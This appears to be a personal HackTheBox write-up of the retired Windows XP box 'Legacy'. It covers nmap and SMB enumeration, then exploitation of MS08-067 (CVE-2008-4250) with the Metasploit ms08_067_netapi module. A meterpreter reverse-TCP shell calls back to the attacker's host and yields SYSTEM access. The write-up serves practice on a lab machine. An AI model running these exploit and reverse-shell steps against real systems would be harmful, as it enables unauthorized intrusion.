HackTheBox: Legacy
01/13/2024
This is the second retired Windows box Ill be doing, after [[Blue]]. Im shamelessly following writeups and Guided mode just to get as much exposure as I can in as little time as possible, as a crash course of sorts. Once Im more comfortable with this OS ill do more boxes on my own.
Enumeration
Three ports open per nmap: 1) msrpc on 135 2) netbios-ssn on 139 3) microsoft-ds on 445
Script scan gives us a few pieces of useful information. Less significantly, the hostname is legacy
.
More significantly, it reveals some juicy information about the SMB server on 139. First, the group name is HTB. Second, anonymous login is allowed.
Enumerating SMB (netbios-ssn)
Ill use smbclient to connect to the SMB server:
$ impacket-smbclient 10.10.10.4
# login
[*] USER Session Granted
# shares
[-] SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.)
huh...
Im not spending a lot of time floundering around like a beached fish here. Im just going to use the writeup, since I know fuck all about Binbows BP
The writeup somehow deduced from the nmap scan that the box might be vulnerable to CVE-2008-4250, which has a metasploit module. This is a RCE vuln made possible by a buffer overflow in Windows RPC.
Exploiting CVE-2008-4250
msf6 > use exploit/windows/smb/ms08_067_netapi
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms08_067_netapi) > set RHOSTS 10.10.10.4
RHOSTS => 10.10.10.4
msf6 exploit(windows/smb/ms08_067_netapi) > set LHOST 10.10.14.24
LHOST => 10.10.14.24
msf6 exploit(windows/smb/ms08_067_netapi) > exploit
[*] Started reverse TCP handler on 10.10.14.24:4444
[*] 10.10.10.4:445 - Automatically detecting the target...
[*] 10.10.10.4:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 10.10.10.4:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 10.10.10.4:445 - Attempting to trigger the vulnerability...
[*] Sending stage (175686 bytes) to 10.10.10.4
[*] Meterpreter session 1 opened (10.10.14.24:4444 -> 10.10.10.4:1035) at 2023-10-13 16:29:49 -0400
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM